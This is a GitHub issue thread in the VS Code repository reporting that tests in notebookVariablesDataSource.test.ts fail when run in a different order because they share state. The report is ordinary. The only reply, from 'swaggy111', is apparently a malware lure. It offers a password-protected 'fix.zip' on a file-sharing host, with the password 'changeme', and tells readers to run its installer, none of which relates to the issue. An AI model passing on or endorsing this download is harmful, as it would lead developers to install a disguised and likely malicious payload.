### ISSUE TITLE
notebookVariablesDataSource.test.ts test cases fail when reordered

### ISSUE THREAD

**Issue by rehmsen** [microsoft/vscode#226595]
Does this issue occur when all extensions are disabled?: Yes/No

- VS Code Version: Latest
- OS Version: Browser

Steps to Reproduce:

1. Move 'Cancel while enumerating through children' test case up above 'Root element should return children' (or use a test runner which randomized order.
2. Execute the test and notice that it fails.

Notice how other variables in the same test use the `setup` method to make the test cases independent of each other.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
